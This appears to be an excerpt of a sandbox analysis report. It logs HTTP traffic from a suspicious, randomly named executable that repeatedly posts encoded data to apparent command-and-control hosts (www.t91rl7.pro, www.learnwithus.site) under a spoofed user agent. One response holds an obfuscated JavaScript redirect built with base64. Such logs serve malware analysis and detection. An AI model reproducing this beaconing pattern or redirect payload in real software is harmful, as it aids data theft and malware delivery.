                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 6b 6d 43 7a 79 35 4f 59 79 57 69 71 56 55 4c 6c 4f 65 66 55 67 66 38 74 52 2b 7a 67 33 42 4b 61 33 7a 6b 2b 52 47 6e 48 44 4b 6c 55 6b 41 64 49 67 3d 3d
                                                          Data Ascii: T0_8iD=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TkmCzy5OYyWiqVULlOefUgf8tR+zg3BKa3zk+RGnHDKlUkAdIg==
                                                          Nov 20, 2024 10:18:58.110779047 CET364INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:18:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 b9 fe ee ae 95 3e 79 81 a6 be 21 5e 45 91 c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 bb cb 67 90 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>>y!^Ef.6PgZ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.749996154.88.22.110801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:59.804099083 CET780OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6e 48 70 54 61 46 33 52 63 2f 59 32 33 38 7a 7a 79 47 59 30 76 50 5a 32 68 5a 65 62 63 6c 52 44 65 6e 78 6d 4b 67 4e 43 6b 6b 4e 4f 58 42 62 74 59 3d
                                                          Data Ascii: T0_8iD=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxnHpTaF3Rc/Y238zzyGY0vPZ2hZebclRDenxmKgNCkkNOXBbtY=
                                                          Nov 20, 2024 10:19:00.670702934 CET364INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:19:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 b9 fe ee ae 95 3e 79 81 a6 be 21 5e 45 91 c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 bb cb 67 90 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>>y!^Ef.6PgZ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.749997154.88.22.110801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:02.351340055 CET1793OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 59 57 6e 49 67 7a 6c 67 67 32 58 33 52 55 4f 41 55 6e 42 32 77 72 70 46 6e 6e 6d 41 48 38 58 65 73 35 67 4a 79 4b 6d 39 56 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 2f 4e 56 46 37 5a 74 74 72 2f 58 77 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 50 43 [TRUNCATED]
                                                          Data Ascii: T0_8iD=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxiHu1Ee7YWnIgzlgg2X3RUOAUnB2wrpFnnmAH8Xes5gJyKm9VuHEEwsfP7cOo0cOka5dkfAQoelkf3qgYt+vKaY/TPpzrKwr+iD+WeLQU+mwSVo/NVF7Zttr/XwWURFSKDabVO6a0ChfkPHe15LsjsKVQDX1m8QUPCNZFvB4xMfFuWfhj/742OnP/VhvklvvYdLEY5pE1p01QtJ95jQVCd0E5GO1o882pc4M0pD12z1+pKhTaoUSS+44JAXdlHAPyFFo9uFxnRhrXAr0pYmW47KFN2MtniQMopZgXN1a60exWORh2owbboSWnPmKihHrBcqw1490bXPRmxukGHozlb/xWhp1JQ/0bc1bFm1jY3kW2dPFP/VRFGl9yTbbtjzSRjnUq2WiGe6rbEOn7qX+vsyyRJROSUNR5lDVwzzzYs2eHssay9cwtQgBhqio4pFLaeVtPiYoAPjLu13lBPQf/u5tHH6bOvYPVZj3en7bDI+UzawahwSfYcwpF03GG99alO/ydtsdOYcTZgkZ1Cyq8lT0xkwlVgCCRifqJy9LgO1+Rt1NQgYdK7F3MlbQUpKcOGF3Fp1/xHl/7O7WcBRI+EbbaHVqlPxfXE//vrhgPNohss3+BGjf1x9BQP6FCzTCOKQMcZM98unXPPxomu7mmuO/N+yIIQnU6+vCGPOs6jVgEXmZ00yWLfkHjs9py9d4eU/p7y8OrvdGsxqcV9QeN2aCthPZLLBEQo8Z1kLzEj4JLuVHV0Q8axSfZd959tgUNtNXJkp/PKTRNXXDSOQlhMfejqPD1WauW0SZEU1JSPtbzQM2Wiwp3v5PRfbK7mInEGd2 [TRUNCATED]
                                                          Nov 20, 2024 10:19:03.218929052 CET364INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:19:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Encoding: gzip
                                                          Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 b9 fe ee ae 95 3e 79 81 a6 be 21 5e 45 91 c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 bb cb 67 90 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 67)N.,(ON,VPV/Ji%IAf>>y!^Ef.6PgZ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.749998154.88.22.110801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:04.893811941 CET510OUTGET /jhb8/?T0_8iD=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3PU81iq8a+B2bm312k5CXACd1kNWr4Nzo6SySfdxrGxphdWFcdj2UAPg&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:19:05.772592068 CET332INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 20 Nov 2024 09:19:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=31536000
                                                          Data Raw: 35 35 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 6d 4f 47 45 79 4c 6e 51 35 4d 54 4a 72 59 53 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 0d 0a 35 0d 0a 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 55<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9mOGEyLnQ5MTJrYS5wcm86ODkxMQ==')</sc5ript>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.749999209.74.77.107801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:10.850107908 CET778OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 52 75 37 7a 54 4a 51 72 75 4f 2b 35 53 6a 4b 6b 78 56 72 6f 73 79 74 6d 41 74 68 4d 58 6e 47 59 33 6a 32 42 56 7a 54 57 73 56 6d 6d 4c 35 6f 41 51 3d 3d
                                                          Data Ascii: T0_8iD=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3Ru7zTJQruO+5SjKkxVrosytmAthMXnGY3j2BVzTWsVmmL5oAQ==
                                                          Nov 20, 2024 10:19:11.425559998 CET533INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:19:11 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.750000209.74.77.107801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:13.396915913 CET798OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4b 57 69 43 4a 58 62 78 36 7a 61 32 6e 75 4d 33 48 79 4a 62 77 4d 72 5a 59 73 57 68 43 4c 43 75 32 68 6c 78 41 33 73 76 59 4d 47 42 71 62 55 37 41 3d
                                                          Data Ascii: T0_8iD=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29KWiCJXbx6za2nuM3HyJbwMrZYsWhCLCu2hlxA3svYMGBqbU7A=
                                                          Nov 20, 2024 10:19:13.995616913 CET533INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:19:13 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.750001209.74.77.107801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:19:15.950922012 CET1811OUTPOST /alu5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.learnwithus.site
                                                          Origin: http://www.learnwithus.site
                                                          Referer: http://www.learnwithus.site/alu5/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 36 49 33 78 58 67 74 52 56 4d 72 39 62 4c 6f 45 51 75 59 58 32 7a 65 6d 76 71 44 48 48 71 48 34 78 74 6b 49 30 74 43 48 62 4b 65 4e 4f 72 38 46 49 2b 71 36 31 77 55 43 79 77 56 75 61 70 77 79 37 75 68 69 79 6e 33 58 4f 6e 67 54 51 78 6b 43 56 6e 35 30 4d 46 2f 76 4c 6d 73 35 45 75 70 32 44 70 78 62 32 62 51 32 43 41 38 65 78 37 63 70 36 6e 76 35 46 55 54 55 68 50 49 6f 30 44 30 67 33 31 45 69 55 44 71 57 44 67 51 2b 67 6a 6c 65 67 49 57 2f 74 50 75 61 67 65 50 58 41 66 4f 66 6b [TRUNCATED]
                                                          Data Ascii: T0_8iD=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF041FeuYL1ySAlJuaiSwHNEv17P1jM+Wr0fBqxWY9ol9z/GLVsnro5FG32fSMMKnMvMdW9YmYwyl7GfBagfysESxJyjr6EBGgktMVRGpBe7oMjn5QsWMKM8Q97BbFrUtMms6I3xXgtRVMr9bLoEQuYX2zemvqDHHqH4xtkI0tCHbKeNOr8FI+q61wUCywVuapwy7uhiyn3XOngTQxkCVn50MF/vLms5Eup2Dpxb2bQ2CA8ex7cp6nv5FUTUhPIo0D0g31EiUDqWDgQ+gjlegIW/tPuagePXAfOfk3OSjgrFW4zwG1iTg0bliafGrZKLGihcL4GNx53PzRBq9zNUgU9qwKLWWsbsKWrNfKesQqB7mstojKF5Gm+hycmBvI3oMhQ2xF+tg98JGN0E3ivVfF6pUy6qny1AN+iQ/Uwc3VG7j6yCqOZSP0av1/8j/WC+L0//o5FS1QPeLAQgKa/hBV/K962dBVMHxhtMwtpExCeMjcrZ8y/kPg6mv5rrtDiZaGBb6q8Lqc1P1sDi/x+mnrvYCnPux7fPrrUViLgJXPvQMDWY8o/5aZMaFR01LD8P2Nwh4KIBygmHpo9R5JuXiOqfN1p87Y/CSa7nRqANuaegCQQPHcM3wwXPs3ll7O3kPdTZJ1wWTX9uHMHtz9uJRce/XVmGZoqycThTz3hEA/e3i4RQLp7FduzXJZ3pZpRCiFIOetRpgfy7HCeCgribAZkv9hXGb9LQRBxM/t2E2Q8Q0+Ke0PkBwHMOsdtQI3+oVbpKwmZEZuaZdZQ5uz9DMuWuAgl7WW2O6hGmUZ2bObf9BAyurfoLafp7MKwK3QY+Oqw79F41LPfZ1OuIuFD0eFYCQmeZzmCa3BaQGJvd8x/O7I7eNUk6TkpDsHxrGsal0fmniG/RInSMRWiMSBvLKZcBmcmzm7JLT0GBpbmKfpgJBJV4ZIw4Xrqixz0S6RpRurjew2f [TRUNCATED]
                                                          Nov 20, 2024 10:19:16.522571087 CET533INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:19:16 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
